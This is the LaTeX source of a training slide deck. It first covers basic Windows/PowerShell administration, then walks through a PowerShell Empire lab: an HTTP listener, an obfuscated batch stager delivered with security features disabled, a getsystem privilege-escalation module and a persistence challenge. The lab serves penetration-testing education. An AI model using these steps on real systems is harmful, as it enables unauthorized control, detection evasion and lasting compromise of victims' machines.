zh\documentclass{article}

\usepackage{graphicx}
\usepackage{ccicons}
\usepackage[hidelinks]{hyperref}
\usepackage{listings}
\usepackage{textcomp}
\usepackage{tcolorbox}
\usepackage{verbatim}
\usepackage{setspace}
\usepackage{multicol}
\usepackage{caption}

\newtcolorbox[auto counter]{slide}[3][]{%
colback=blue!5!white,colframe=blue!80!gray,height from=4in to 9in,
title={\addcontentsline{toc}{section}{\thetcbcounter ~~ #2}\bf\Large\thetcbcounter ~ #2\hfill #3 \label{slide \thetcbcounter}\setcounter{section}{\thetcbcounter}}}

\title{PowerShell & Empire Basics}
\author{Korben Bujnicki & Jeffrey Zhang}
\date{April 2025}

\begin{document}

\maketitle
\vfill
\begin{center}
    \ccby \\
    This work is licensed under a Creative Commons Attribution 4.0 International License.
\end{center}

\newpage
\tableofcontents


\newpage

\Large
\section{What is PowerShell Empire?}
PowerShell Empire is a post-exploitation framework designed for penetration testing and red team operations, leveraging PowerShell's capabilities to execute advanced attack techniques and manage compromised systems.
\begin{itemize}
    \item Versatile modules: Provides a wide range of modules for reconnaissance, credential harvesting, lateral movement, and persistence.
    \item Agent-based control: Uses agents to establish secure communication channels with compromised systems for command execution and data collection.
    \item Stealthy operation: Employs obfuscation techniques and leverages PowerShell's capabilities to avoid detection by security measures.
    \item Customizable scripts: Allows penetration testers to develop and deploy customized scripts tailored to specific scenarios.
    \item Community-driven: Supported by an active community, providing documentation, updates, and tools for effective usage.
    \item Cross-platform support: While primarily designed for Windows environments, it can integrate with other systems during assessments.
\end{itemize}
\pagebreak

\begin{slide}{Introduction to PowerShell}{}
PowerShell is a powerful command-line shell and scripting language built on .NET, commonly used by system administrators and attackers alike.

\begin{itemize}
    \item Cmdlets: Small commands like `Get-Process`, `Get-Service`, `Set-ExecutionPolicy`
    \item Piping: Output of one command can be sent to another using `|`
    \item Remote Execution: Use `Invoke-Command` or `Enter-PSSession`
\end{itemize}

Example:
\begin{verbatim}
Get-Process | Where-Object { $_.CPU -gt 100 }
\end{verbatim}
\end{slide}

\begin{slide}{Installing PowerShell - Windows Management Framework}{}
\begin{itemize}
    \item PowerShell V3 - Windows 8 and Server 2012
    \item Powershell V2 - Windows 7 and Server 2008
    \item Download the Windows Management Framework 3.0 at http://www.microsoft.com/en-us/download/details.aspx?id=34595
    \item Windows XP and Server 2003 can run V2
\end{itemize}
\end{slide}

\begin{slide}{Task 1: Network Configuration and Management}{}
    Use the following commands to manage and troubleshoot network settings:
    \\ \\
    \texttt{ipconfig /all} - Displays detailed network configuration information. \\
    \texttt{ipconfig /release} - Releases the current IP address. \\
    \texttt{ipconfig /renew} - Renews the IP address. \\
    \texttt{ipconfig /displaydns} - Displays DNS resolver cache. \\
    \texttt{ipconfig /flushdns} - Clears the DNS cache. \\
    \texttt{nslookup} - Queries DNS servers for hostname or IP resolution.
\end{slide}
Goal: Count how many entries are in the DNS resolver cache.
\pagebreak

\begin{slide}{Challenge 1: Using Powershell on Registry Editor}{}
    \begin{enumerate}
    \item Create a new registry key at:
    \texttt{HKCU:\textbackslash Software\textbackslash TestKey}
    \item Adds a new string value named \texttt{TestValue} with initial data \texttt{"Hello"}
    \item Modifies the value of \texttt{TestValue} to \texttt{"Hello, World!"}
    \end{enumerate}
    \texttt Use all tools at your disposal; Since we haven't touched on registry editor within our classes yet, use of Google and LLMs are encouraged.
\end{slide}

\pagebreak

\section*{Solution}

\begin{lstlisting}[style=powershell,caption={PowerShell Script}]
# Step 1: Define the registry path
$regPath = "HKCU:\Software\TestKey"

# Step 2: Create the registry key if it doesn't exist
if (-not (Test-Path $regPath)) {
    New-Item -Path $regPath -Force
}

# Step 3: Create a new string (REG_SZ) value named
"TestValue" with "Hello"
New-ItemProperty -Path $regPath -Name "TestValue" -Value
"Hello" -PropertyType String -Force

# Step 4: Modify the string value to "Hello, World!"
Set-ItemProperty -Path $regPath -Name "TestValue" -Value
"Hello, World!"

# Optional: Output the result
Get-ItemProperty -Path $regPath | Select-Object TestValue
\end{lstlisting}


\pagebreak

\begin{slide}{Task 3: Power and Battery Management}{}
    Use these commands to evaluate power and battery performance:
    \\ \\
    \texttt{powercfg /energy} - Generates an energy usage report. \\
    \texttt{powercfg /batteryreport} - Creates a detailed battery performance report.
    
\end{slide}
Goal: Locate the generated report using powershell and "cat" it.
\pagebreak

\begin{slide}{Task 4: File System and Disk Management}{}
    Use these commands to inspect and repair disk integrity:
    \\ \\
    \texttt{chkdsk /f} - Fixes errors on the disk. \\
    \texttt{chkdsk /r} - Locates bad sectors and recovers readable data. \\
    \texttt{sfc /scannow} - Scans and repairs system files.
\end{slide}
Goal: Perform a scan, wait until the scan completes and view the results.
\pagebreak

\begin{slide}{Task 5: Managing Deployment Images with DISM}{}
    Use DISM commands to service and repair system images:
    \\ \\
    \texttt{DISM /Online /Cleanup-Image /CheckHealth} - Checks image health. \\
    \texttt{DISM /Online /Cleanup-Image /ScanHealth} - Scans image for corruption. \\
    \texttt{DISM /Online /Cleanup-Image /RestoreHealth} - Repairs system image.
\end{slide}
Goal: Scan the health of the current disk.
\pagebreak

\begin{slide}{Task 6: Process and Task Management}{}
    Manage and monitor system processes with these commands:
    \\ \\
    \texttt{tasklist} - Displays currently running processes. \\
    \texttt{taskkill} - Terminates specific processes by ID or name.
\end{slide}
Mini-Challenge: Start Notepad via Windows Start Menu, and Kill it with Powershell.
\pagebreak

\section*{Solution}

\begin{lstlisting}[style=powershell,caption={PowerShell Script}]
# Step 1: Find the task
tasklist | findstr Notepad.exe

# Step 2: Terminate the task
taskkill /PID <notepad PID> /F
\end{lstlisting}

\pagebreak

\begin{slide}{Task 7: Network Analysis Utilities}{}
    Use these commands for detailed network activity analysis:
    \\ \\
    \texttt{netstat} - Displays active network connections. \\
    \texttt{netstat -af} - Shows all active connections and listening ports. \\
    \texttt{netstat -o} - Displays connections with process IDs. \\
    \texttt{netstat -e -t 5} - Monitors network stats every 5 seconds.
\end{slide}
Goal: Write a netstat command that monitors the network stats every second.
\pagebreak

\begin{slide}{Task 9: Routing Commands}{}
    Configure and manage routing tables using these commands:
    \\ \\
    \texttt{route print} - Displays the routing table. \\
    \texttt{route add} - Adds a static route. \\
    \texttt{route delete} - Deletes a static route.
\end{slide}
Goal: Find the route to 127.0.0.1 in the routing table using powershell.

\pagebreak
\section*{Solution}
\begin{lstlisting}[style=powershell,caption={PowerShell Script}]
route print | findstr <IP>
\end{lstlisting}

\pagebreak

\begin{slide}{Task 10: Connectivity and Diagnostics}{}
    Use these commands to troubleshoot connectivity issues:
    \\ \\
    \texttt{ping -t} - Sends continuous ping requests. \\
    \texttt{tracert} - Traces the route packets take to a host. \\
    \texttt{tracert -d} - Traces route without resolving hostnames.
\end{slide}
\pagebreak

\begin{slide}{Task 11: General System Utilities}{}
    Use these commands to interact with and manage system settings:
    \\ \\
    \texttt{cls} - Clears the command prompt screen. \\
    \texttt{clip} - Copies command output to the clipboard. \\
    \texttt{getmac /v} - Displays MAC address details. \\
    \texttt{shutdown /r /fw /f /t 0} - Restarts the system immediately.
\end{slide}
\pagebreak

\begin{slide}{Challenge 2: Powershell Scripting}{}
    \begin{enumerate}
  \item \textbf{Creates a \texttt{.txt} file on the desktop} with a custom message.
  \item \textbf{Monitors the file} using a loop or event-based method.
  \item If the file is \textbf{deleted}, it \textbf{automatically recreates it}.
\end{enumerate}
    \texttt Use all tools at your disposal; including LLMs.
\end{slide}

\pagebreak

\section*{Solution}

\begin{lstlisting}[language=PowerShell,caption=Self-Healing Note Script]
# Path to the desktop note
$desktopPath = "$env:USERPROFILE\Desktop"
$notePath = Join-Path $desktopPath "Reminder.txt"

# Content of the reminder
$noteContent = "Don't forget to take a break!"

# Create the initial note
Out-File -FilePath $notePath -InputObject $noteContent -Encoding UTF8

# Infinite loop to monitor the file
while ($true) {
    if (-not (Test-Path $notePath)) {
        # Log the restoration
        $timestamp = Get-Date -Format
        "yyyy-MM-dd HH:mm:ss"
        Write-Host "[$timestamp] Reminder
        note was deleted. Restoring..."

        # Recreate the file
        Out-File -FilePath $notePath -InputObject
        $noteContent -Encoding UTF8

        # Optional: play a beep sound
        [console]::beep(800, 300)
    }
    Start-Sleep -Seconds 3
}
\end{lstlisting}

\section*{Notes}
\begin{itemize}
  \item The script continuously checks every 3 seconds.
  \item If the file is deleted, it is recreated with the original message.
  \item Optionally, a beep is triggered when the note is restored.
  \item You can run this script as a background job using \texttt{Start-Job} or package it as a scheduled task.
\end{itemize}

\pagebreak

\newpage
\begin{slide}{What is PowerShell Empire?}{}
Empire is a post-exploitation framework that leverages PowerShell agents to execute commands on compromised systems.

\begin{itemize}
    \item Developed for Red Team and pentesting engagements
    \item Uses encrypted communications
    \item Modular architecture with many built-in capabilities
\end{itemize}

Empire allows remote code execution, data exfiltration, privilege escalation, and lateral movement across networks.
\end{slide}
\pagebreak

\newpage
\begin{slide}{Task 12: Installation}{}
\begin{itemize}
    \item Install on Kali Linux: \texttt{sudo apt install powershell-empire}
    \item open two terminals
    \item on the left one: \texttt{sudo powershell-empire server}
    \item On the right one: \texttt{sudo powershell-empire client}
    \item This is where we do everything on this empire client window
\end{itemize}
\end{slide}
\pagebreak

\newpage
\begin{slide}{What is PowerShell Empire Staging?}{}
PowerShell Empire Stagers establish a connection to the Empire Server, creating an Agent that enables control over compromised systems.

\begin{itemize}
    \item Stagers connect back to the Empire Server to create Agents.
    \item Listeners are required for Stagers to establish connections.
    \item Agents facilitate interaction with and control of compromised systems.
\end{itemize}

To configure a Listener in PowerShell Empire, use the \texttt{uselistener} command followed by the desired Listener type. You can view all available Listener options by running \texttt{uselistener} and tabbing through the list.
\end{slide}
\pagebreak


\newpage
\begin{slide}{Task 13: Setting Up Listener}{}
\begin{itemize}
    \item Run \texttt{uselistener http}
    \item next \texttt{set Name MyListener}
    \item Then \texttt{set Port 80}
    \item Now run it with \texttt{execute}
    \item You can take a look at your config any time with the \texttt{options} command
    \item Further you can go back with \texttt{back} and view all your active listeners with \texttt{listeners}
\end{itemize}
\end{slide}
\pagebreak


\newpage
\begin{slide}{What are PowerShell Empire Stagers?}{}
Stagers are pieces of code used in PowerShell Empire to execute payloads on target machines. These payloads establish a connection back to a Listener, enabling the creation of an Agent for remote control of compromised systems. The Stager also initiates the Encrypted Key Exchange protocol to secure C2 communication.

\begin{itemize}
    \item Types of Stagers include:
    \begin{itemize}
        \item Malicious scripts (.bat, .hta, .vbs, etc.)
        \item Dynamic Link Libraries (DLLs)
        \item Executables (.exe)
        \item Shellcode
        \item Microsoft Office macros
        \item Cross-platform stagers for Linux and macOS
    \end{itemize}
    \item To create a Stager, use the \texttt{usestager} command followed by the desired Stager type.
    \item View available Stager options by running \texttt{usestager} and tabbing through the list.
\end{itemize}
\end{slide}
\pagebreak

\newpage
\begin{slide}{ Task 14: Setting Up Stager}{}
\begin{itemize}
    \item For this tutorial run: \texttt{usestager windows\_launcher\_bat}
    \item \texttt{set Listener MyListener}
    \item \texttt{set Obfuscate True}
    \item run it: \texttt{execute}
    \item type:\texttt{options} to make sure it worked
\end{itemize}
\end{slide}
\pagebreak



\newpage
\begin{slide}{ Challenge 3: Get the Stager onto the windows machine}{}
\begin{itemize}
    \item Hint: When executed the stager it gave you a file location.
    \item Hint: Create a basic python web server.
    \item Reminder: you may need to disable some windows security features in order to run the stager.
    Warning: Make sure you run the stager as administrator we will use this later. 
\end{itemize}
\end{slide}
\pagebreak

\newpage
\begin{slide}{Task 15: Using the Empire Agent}{}
When a system is compromised and connects back:
\begin{itemize}
    \item It appears in the “agents"
    \item Use command \texttt{agents}
    \item The name doesn't look good lets fix that with \texttt{rename MyAgent}
    \item We can interact with this agent with \texttt{interact MyAgent}
\end{itemize}
\end{slide}
\newpage

\Large
\section{What are modules?}
Powershell Empire provides a wide variety of modules to extract credentials, monitor activity, and move laterally.

\begin{itemize}
    \item Module functionalities: Includes actions such as collecting browser data, dumping passwords, exploiting local vulnerabilities, establishing persistence, performing reconnaissance, and moving laterally.
    \item Module diversity: Contains over 400 modules written in PowerShell, Python, and C\#.
    \item Practical applications: Popular modules can be used for detailed post-exploitation tasks and streamlining operations.
\end{itemize}
\pagebreak

\newpage
\begin{slide}{Task 16: Module: Privilege Escalation}{}
\begin{itemize}
    \item If your stager has admin priveleges it will have * next to it. Check using \texttt{agents}
    \item Let's gain system level priveleges with \texttt{usemodule powershell\_privesc\_getsystem}
    \item Set the agent: \texttt{set Agent [Agent ID]} use the agent ID not the name we set. 
    \item Now run it with \texttt{execute}
    \item Now type \texttt{interact [Agent ID]} to use the powershell with system privileges.
\end{itemize}
\end{slide}
\pagebreak

\newpage
\begin{slide}{Challenge 4: Module: Establish Persistence}{}
Use what you have learned about modules to establish persistence on the system
\begin{itemize}
    \item Hint: Google to find which module elevates persistence.
    \item Reminder: Don't forget to set agent ID and set the listener.
    \item Hint: you can check if it worked with \texttt{interact [Agent ID]}
\end{itemize}
\end{slide}



\end{document}
